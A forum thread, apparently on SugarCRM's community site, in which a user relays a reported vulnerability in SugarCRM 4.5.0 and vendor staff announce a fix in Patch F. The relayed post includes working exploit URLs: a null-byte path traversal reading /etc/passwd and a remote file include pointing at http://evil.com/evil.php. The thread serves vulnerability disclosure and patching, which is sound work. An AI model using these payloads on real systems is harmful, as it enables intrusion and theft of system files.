Potential security issue or hot air?

[tdp]

I want to start this thread by saying that I am NOT a PHP programmer, so I honestly can't pass judgement on the validity of this. However, I would like someone with some knowledge to take a look. I frequent a Linux forum, and the topic of SugarCRM came up. One poster claimed that SugarCRM has a security problem, and when pressed for an explanation, this is what he posted:

The one I found in 10 min will only work with systems affected by the null-byte bug.

example:
/sugarcrm/index.php?page=licensePrint&language=../../../../../../../../etc/passwd%00

The problem can lead to a remote include because 'sugarEntry' is defined at the top of index.php
Now an attacker could include any restricted file, and with registered globals on, easily get remote include.
Easy remote include vuln is in:
modules/Administration/RebuildAudit.php

So by doing:
/sugarcrm/index.php?page=licensePrint&language=../../modules/Administration/RebuildAudit.php%00&beanFiles[youFigureItOut]=http://evil.com/evil.php?

If registered globals is off, then local file include is still possible. Most attackers can figure out how to inject php code into log files.

Now I do know that you should have register_globals turned off, but if this poster is to be believed, that may not matter.

Like I said, I'm not a PHP programmer and the person who posted this may have an axe to grind, so any insight would be welcomed.

[andydreisch]

Hi tdp, I'll check with the Security team.

Thanks for passing this along.

Andy

[mch423]

tdp,

Thanks for bringing it to our attention. We have fixed it in the 4.5.0f release. Look for it very soon!


- Max

[tdp]

Thanks for the update guys, it is appreciated.

[clint]

4.5.0 Patch F is now available.

We are encouraging all Sugar 4.5.0 users to upgrade to this patch immediately due to this reported security vulnerability.

This vulnerability is only in Sugar 4.5.0.